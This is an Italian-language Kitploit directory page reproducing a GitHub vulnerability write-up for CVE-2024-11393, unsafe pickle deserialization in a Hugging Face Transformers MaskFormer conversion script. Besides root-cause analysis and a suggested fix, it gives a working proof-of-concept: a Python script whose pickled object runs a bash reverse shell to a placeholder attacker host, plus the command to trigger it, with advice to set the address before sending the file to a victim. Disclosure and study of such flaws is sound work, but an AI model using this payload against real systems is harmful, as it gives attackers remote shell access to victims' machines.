Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-11393 — Dettagli tecnici ed exploit per CVE-2024-11393 | Kitploit
Strumenti/GitHubGitHub/piyush-bhor/cve-2024-11393
Analisi delle VulnerabilitàAnalisi del CodiceExploitApprendimento e FormazioneSviluppo PayloadBinary Exploitation
GitHubpiyush-bhor/cve-2024-11393

CVE-2024-11393

Dettagli tecnici ed exploit per CVE-2024-11393

Vedi Repository
411 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-11393

Vulnerabilità di esecuzione di codice remoto nella deserializzazione di dati non attendibili nel modello MaskFormer di Hugging Face Transformers

Panoramica di alto livello ed effetti della vulnerabilità:
La vulnerabilità consente a un utente malintenzionato di eseguire codice arbitrario sulla macchina vittima fornendo un file checkpoint maskformer resnet dannoso allo script convert_maskformer_swin_to_pytorch.py nel repository Hugging Face Transformers.
Se un utente ignaro utilizza un file checkpoint maskformer resnet di terze parti, l'esecuzione dello script convert_maskformer_swin_to_pytorch.py porterà all'esecuzione di codice remoto (RCE) sul sistema della vittima.

Il prodotto vulnerabile

  • Prodotto: Hugging Face Transformers
  • Modulo: Maskformer
  • File: transformers/src/transformers/models/maskformer/convert_maskformer_swin_to_pytorch.py
  • Versione: Ultima
  • Permalink GitHub: https://github.com/huggingface/transformers/blob/c8c8dffbe45ebef0a8dba4a51024e5e5e498596b/src/transformers/models/maskformer/convert_maskformer_swin_to_pytorch.py#L240

Analisi della causa principale

  • Descrizione dettagliata della vulnerabilità: La vulnerabilità deriva dalla deserializzazione non sicura di dati non attendibili. Lo script utilizza pickle.load per caricare il file checkpoint ed è vulnerabile all'esecuzione di codice.

  • Flusso del codice dall'input alla condizione vulnerabile:

  1. L'utente scarica un modello maskformer di terze parti.
  2. L'utente esegue lo script convert_maskformer_swin_to_pytorch.py e gli passa il file checkpoint.
  3. Lo script convert_maskformer_swin_to_pytorch.py deserializza il file checkpoint ed esegue il codice dannoso.
  • Punto di iniezione: La vulnerabilità si verifica nel punto in cui viene chiamato pickle.load.
    Permalink GitHub: https://github.com/huggingface/transformers/blob/c8c8dffbe45ebef0a8dba4a51024e5e5e498596b/src/transformers/models/maskformer/convert_maskformer_swin_to_pytorch.py#L240

  • Correzioni suggerite: Sostituire pickle.load con yaml.safe_load(yaml_file) oppure json.load per impedire l'esecuzione di codice arbitrario.

  • Istruzioni per eseguire la proof-of-concept:

  1. Creare un file pickle dannoso malicious.pkl che creerà una reverse shell sul sistema della vittima:
root@kitploit:~
# exploit.py

import pickle  
import os   
  
class Exploit:  
    def __reduce__(self):  
        return (os.system, ('bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1',))  
  
malicious_data = pickle.dumps(Exploit())  
with open('malicious.pkl', 'wb') as f:  
    f.write(malicious_data)  
  
print("Malicious pickle file created successfully.")

Nota: Modificare ATTACKER_IP e ATTACKER_PORT prima di inviare il file alla vittima.

  1. Eseguire lo script convert_maskformer_swin_to_pytorch.py e passare il file malicious.pkl a --checkpoint_path:
root@kitploit:~
> python convert_maskformer_swin_to_pytorch.py --checkpoint_path malicious.pkl --model_name maskformer-swin-tiny-ade --pytorch_dump_folder_path . --push_to_hub 

Nota: pytorch_dump_folder_path può essere impostato su qualsiasi directory e model_name può essere qualsiasi modello.

Link per il download del software:
https://github.com/huggingface/transformers/tree/main

Scarica lo strumento